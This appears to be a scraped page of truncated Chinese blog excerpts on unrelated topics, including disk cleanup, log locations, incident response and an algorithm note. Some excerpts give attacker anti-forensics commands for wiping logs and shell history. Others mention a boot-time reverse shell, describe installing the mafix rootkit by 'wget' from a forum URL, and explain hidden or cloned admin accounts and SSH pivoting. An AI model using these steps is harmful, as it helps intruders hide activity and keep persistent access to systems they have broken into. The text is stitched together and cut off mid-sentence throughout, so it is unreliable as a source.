Windows的日志文件通常有应用程序日志,安全日志.系统日志.DNS服务器日志.FTP日志.WWW日志等等. 应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT; 安全日志文件:%systemroot%\system32\config\SecEvent.EVT; 系统日志文件:%systemroot%\system32\config\SysEvent.EVT; DNS日志默认位置:%sys temroot%\system32\config,默认…

清除history历史命令记录 vim ~/.bash_history //编辑history记录文件,删除部分不想被保存的历史命令 history -c //清除当前用户的history命令记录 HISTSIZE=0 //通过修改配置文件/etc/profile,使系统不再保存命令记录 清除系统日志痕迹 Linux 系统存在多种日志文件,来记录系统运行过程中产生的日志. /var/log/btmp 记录所有登录失败信息,使用lastb命令查看 /var/log/lastlog 记录系统中所有用…

rm -f -r /var/log/*rm .bash_historyrm recently_used…

后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有:t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号. URL:http://forum.eviloctal.com/attachment.php?aid=13419 安装及使用: wget http://forum.eviloctal.com/attachme…

1.痕迹清理的基本概念 在渗透测试的过程结束后清理自己在从开始接触到目标计算机是开始所有操作的痕迹 2.痕迹清理的目的 为下一步的渗透测试拖延时间 提高隐蔽性 所有的痕迹清理都不是绝对的,只要和计算机有接触就一定会有痕迹 第三方日志记录平台结构对于痕迹清理是基本无解的安全方案 3.windows痕迹记录的基本机制 4.windows痕迹清理的注意事项 基本结构:时间.用户.地点.操作…

日志查看 (1) 启动Windows实验台,点击:开始 - 控制面板 - 管理工具 - 事件查看器. (2) 应用程序日志.安全日志.系统日志.DNS日志默认位置:%sys temroot%\system32\config,默认文件大小512KB,管理员可以改变这个默认大小. 在事件查看器中右键应用程序(或安全性.系统.DNS服务器)查看属性可以得到日志存放文件的路径,并可修改日志文件的大小,清除日志. 选中事件查看器中左边的树形结构图中的日志类型(应用程序.安全性或系统),右击"查看"…

1.net user 查看当前有哪些用户 2.net localgroup administrators 查询administrators最高权限组有哪些用户 3.net user administrator 查询这个用户上次登录的日期 4.找出异常账号上次登录日期修改的时间,看攻击者释放了什么文件. 5.netstat -ano查看有哪些异常的进程及端口,然后找出异常的进程的PID号进行分析 6.tasklist|findstr PID号查询端口对应的异常进程程序 7.用任务管理器查找对应的进…

检查系统信息.用户账号信息 系统信息 ● 查看系统版本以及补丁信息 systeminfo 用户账号信息 ● 基本使用 ○ 创建普通账号并加入administrarors 组 net user test 123456 /add net localgroup administrators test /add ● 创建隐藏账号 net user test$ /add ● 创建克隆账户 进入注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users Names…

今天因为连服务器的时间慢了很多,然后看了一下C盘的空间,OMG剩下222K.然后一直上网找解决方案. 按照惯例,应该开一个360看看,C盘清理啊,搬家什么的.360告知的竟然是没有可以搬移的,所以,这个方案是行不通了. OK,那好,找找有什么可以删的没,然后发现能删的都删了.例如: 1.C:\Windows\Web\Wall*** 自带墙纸,不需要的可以删除掉.2.C:\Windows\System32\DriverStore\FileRepository 系统自带驱动程序备份,大小为1.09G…

dfs通过递归将每种情景分割在不同的时空,但需要对每种情况对后续时空造成的痕迹进行清理(这是对全局变量而言的,对形式变量不需要清理(因为已经被分割在不同时空)) bfs由于不是利用递归则不能分割不同的时空,但其利用队列将不同时空下的步骤在时间上进行同步(但队列内部的并不都是同一时间的) 但必须要区分在队列内的与从队列里拿出来的时间关系,所以对于类似于取钥匙开门的操作,应该判定在钥匙位置被提出队列时才能触发开门功能,而不能认为钥匙在队列时就能开门也就是bfs的作用效果要放在位置被提出队列时展开,而…

在对Windows系统进行升级之后会发现C盘多出一个Windows.old文件夹,直接点击删除缺没有权限,不能进行删除. 在对window进行修复补丁时会产生大量的补丁更新文件,有时不清楚文件存在在哪里或者找到但是没有权限删除. 步骤: 1.用鼠标右键C盘,选择列表里面的“属性”,在“属性”窗口中选着磁盘清理 2.此时,程序开始对系统里进行清理的文件进行扫描 3.在打开的“磁盘清理”对话框里找到“清理系统文件”,并点击继续 4.程序进行再次扫描操作 5.对于要删除Windows.old文件夹,请…

背景说明 扫描是一切入侵的基础,通过扫描来发现目标主机是否为活动主机.操作系统是什么版本.开放了哪些服务等.扫描技术纷繁复杂,新的扫描技术也层出不穷,不可能穷举所有扫描技术,下面按入侵步骤对主机扫描.端口扫描和服务扫描技术做一个简要分类与概述. 活动主机扫描可分为两类:1)ICMP echo扫描与Broadcast ICMP扫描:端口扫描也分为两类:1)开放扫描,这类扫描会产生大量的审计数据,容易被对方发现,但其可靠性高(例如TCP connect扫描):2)秘密扫描,这类扫描能有效的避免对方入…

mysql会给出我们最近执行的SQL命令和脚本:同linux command保存在~/.bash_history一样,你用mysql连接MySQL server的所有操作也会被记录到~/.mysql_history文件中,这样就会有很大的安全风险了,如添加MySQL用户的sql也同样会被明文记录到此文件中. 1,查看你系统的~/.mysql_history隐藏文件 (我的测试环境下,一般linux的mysql用户来管理,所以在/home/mysql目录下会有这个文件) -bash-3.2$ ls…

免责声明:本文档中所述过程为 2012 年 1 月时起的情况,如有变更,恕不另行通知. 希望将应用程序部署到 Windows Azure 的企业客户(实际上是所有客户)最为关心的就是其数据的安全性.释放磁盘空间并将其重新分配给其他客户时,要确保新的所有者无法读取释放空间后磁盘上原来的数据,在数据保护中这一点有时会被忽视.一个极端的例子是,废弃处理从数据中心移除的驱动器或在其他任务中再次利用.释放之前先使用零或其他模式覆盖释放的空间,是确保这一点最简单的方式.这种覆盖可能会大大影响性能,因此 Az…

系统清理.bat @echo off color 0a title windows7系统垃圾清理--- echo ★☆ ★☆ ★☆ ★☆ ★☆★☆★☆ ★☆ ★☆ ★☆ ★☆★ echo ★☆ ★☆ ★☆ ★☆ ★☆★☆★☆ ★☆ ★☆ ★☆ ★☆★ echo.★☆ ☆★ echo.★☆ 清除系统垃圾文件 ☆★ echo.★☆ 请稍等...... ☆★ echo ★☆ ☆★ echo.★☆ ☆★ echo ★☆ ★☆ ★☆ ★☆ ★☆★☆★☆ ★☆ ★☆ ★☆ ★☆★ echo ★☆ ★☆ ★☆…

一.关闭IIS HTTPRERR日志功能 默认情况下,2003服务器会把所有IIS访问错误的记录写入 C:WINDOWSsystem32LogFilesHTTPERR 下的 log 文件中,如果访问量比较大,可能一段时间后 日志文件可能会占满C盘空间,导致服务器死机 同时因为要写入所有的IIS访问记录,如果访问量较大会大大增加服务器CPU占用率 关闭HTTPERR的方法 运行里输入 regedit 进入注册表编辑器 [HKEY_LOCAL_MACHINESYSTEMCurrentControlS…

记录一次由于磁盘空间满,IIS使前端程序报500的事故 由于导出Api部署在IIS服务器,在程序调用导出Api会报500 发现windows服务器C盘已满 下面处理过程 只需复制cleanmgr.exe和cleanmgr.exe.mui两个文件. 1.将"C:\Windows\winsxs\amd64_microsoft-windows-cleanmgr_31bf3856ad364e35_6.1.7600.16385_none_c9392808773cd7da\cleanmgr.exe"…

用习惯了客户端版的Windows,对于磁盘清理想必大家都不会陌生,他具有安全.快捷.准确.集中化的删除系统中的临时文件.管理系统还原卷影副本.添加删除程序的快捷入口等便捷功能,而在Server版的Windows中“磁盘清理”默认情况是没有安装的,本文将介绍如何找回“磁盘清理”. 现象 因为磁盘清理属于客户端版Windows的标配,本身并不存在消失等因素,而同时很多针对客户端版Windows的功能均不会默认添加到服务器版Windows中:比如Windows媒体播放器,主题,特效等相对来说属于前台应…

样子: 支持系统: Windows NT 5.x/6.x 32及64位所有系统.需.net framework 2.0运行环境 功能: 清理上述系统中冗余的Windows Installer补丁文件.有如下特点: 高效扫描+清理,并有进度反馈 可选择清理指定文件 可排序 可选择删除到回收站,或直接删除 说明: 类似工具有几个,其中我熟知的是smallfrogs大牛的[Windows Installer 冗余文件清理工具](下文称WIC),事实上在这之前我一直就用他的工具进行相关任务(目前他的官网…

删除多余的发送到选项 Win7使用一段时间后,我们可能会装很多软件,这时候右键菜单可能会变得很长,特别是“发送到(Send to)”里面的选项,有时候我们卸载软件之后在右键发送到菜单里还会有残存的选项,如果我们想清理一下Win7系统右键菜单“发送到”里面的选项,该怎么操作呢? 首先设置 文件夹选项 -显示隐藏的文件.文件夹和驱动器 WinXP系统的“发送到”选项保存在: C:\Documents and Settings\Administrator\SendTo 文件夹中 Win7的“发送到”选…

====手动清理C盘(开始\运行\cleanmgr,选择C盘...)或者如下右键C盘,选择属性,点击通用页签下方[磁盘清理]按钮.磁盘清理界面,中间部分可以选择要清理的项目,可以全选.然后点击下方的清理即可. 每选择一个项目,也可以点击右下角的[显示文件]可以打开相关目录.有些项目,没有这个显示文件的按钮,表示要清楚的是某类不重要的临时文件,日志,缓存等,没有固定的存放位置的文件. 这就是windows内置的清理工具cleanmgr的通常用法.====下面还有cleanmgr的高级使用方法 开始…

原文:清理Windows图标缓存 | 懒人屋 文章背景 这是一个抄袭的文章,原文在参考资料中 运行环境 操作系统:Windows 10 x64(1903) 清理脚本 @echo off rem 关闭Windows外壳程序explorer taskkill /f /im explorer.exe rem 清理系统图标缓存数据库 attrib -h -s -r "%userprofile%\AppData\Local\IconCache.db" del /f "%userprof…

日期:2019-06-07 16:11:49 作者:Bay0net 介绍:Windows 应急响应.取证及溯源相关内容学习记录 0x00.前言 常见的应急分类: web入侵:网页挂马.主页篡改.Webshell 系统入侵:病毒木马.勒索软件.远控后门 网络攻击:DDOS攻击.DNS劫持.ARP欺骗 0x01.入侵排查过程 1.1 系统账户相关 注意事项:弱口令.22/3389 等端口是否对外 查看账号的方法: net user(无法列出$用户) lusrmgr.exe(无法找到注册表方式建立的用…

本文由 www.169it.com 收集整理 Windows优化大师是一款功能强大的系统工具软件,它提供了全面有效且简便安全的系统检测.系统优化.系统清理.系统维护四大功能模块及数个附加的工具软件.使用Windows优化大师,能够有效地帮助用户了解自己的计算机软硬件信息:简化操作系统设置步骤:提升计算机运行效率:清理系统运行时产生的垃圾:修复系统故障及安全漏洞:维护系统的正常运转. Windows优化大师特点 1.具有全面的系统优化选项 向用户提供简便的自动优化向导 优化项目均提供恢复功能 2.…

如何判断自己的服务器是否被入侵了呢?仅仅靠两只手是不够的,但两只手也能起到一些作用,我们先来看看UNIX系统上一些入侵检测方法,以LINUX和solaris为例. 1.检查系统密码文件 首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期. 检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来. awk –F:’$3==0 {print $1}’ /etc/passwd 顺便再检查一下系统里有没有空口令帐户: awk –F:…

如何判断自己的服务器是否被入侵了呢?仅仅靠两只手是不够的,但两只手也能起到一些作用,我们先来看看UNIX系统上一些入侵检测方法,以LINUX和solaris为例. 1.检查系统密码文件 首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期. 检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来. 顺便再检查一下系统里有没有空口令帐户: 2.查看一下进程,看看有没有奇怪的进程 重点查看进程: ps –aef | grep ine…

一.ssh远程端口转发 背景:当我们在渗透过程中,获取到内网的一台仅有内网IP的服务器后,我们可以通过ssh隧道,将内网某个主机的端口进行远程转发 1.网络拓扑图 假设获取的服务器为web服务器,web服务器将远程内网目标服务器的3389端口,通过ssh远程端口转发给VPS的3307端口,然后在VPS上访问自己本地地址和3307,即可远程到内网的主机 2.实验环境 VPS:192.168.4.134 web服务器:1.1.1.11 数据库服务器:1.1.1.12 3.实验步骤 在web服务器上执…

windows下的的oracle ,实例启动时是会向windows操作系统的事件查看器--应用程序 部分写入启动信息的,并且这个写入行为无法用oracle 的参数或者其他手段去禁止. 若是事件查看器--应用程序的日志满了,会导致如下的情况:ORA-28056: Writing audit records to Windows Event Log failed. 清理完日志之后,数据库实例就能启动了,如下:…

to liuxiyao: 出现这样的问题我推断是由于系统有一些必须的dll类库没有被build进系统中,你在构建时多加入一些系统组件试试.(我想通过评论发可是发了5.6遍CSDN没反应,就写到这里吧,希望你能看到)  之前有玩过Microsoft的Windows XPE,可以小到200多M,对于资源比較有限的系统来说还是不错的,仅仅是Microsoft的制作套件太耗内存了,内存小的就不要尝试了,不然那漫长的1个多小时你除了等待之外什么都做不了.只是即使内存比較大的,还是建议把系统的虚拟内存设置的…

今天给大家介绍一个卸载Windows上软件的工具Windows Installer Clean Up,可以卸载电脑上的很多控制面板里面卸载不掉的软件,或者卸载过程中出现问题的软件. (1)出现的现象: 系统安装的某些软件有时候想卸载的时候就是各种卸载不了,并且有的卸载之后有残留.垃圾文件,又或者博主遇到的情况:卸载jdk的时候一直提示“安装过程正处于暂停状态,您必须先撤销安装过程出现的修改(如下图)”,点击“是”之后电脑开始蓝屏,蓝屏之后提示SYSTEM SERVICE EXCEPTION(Vr…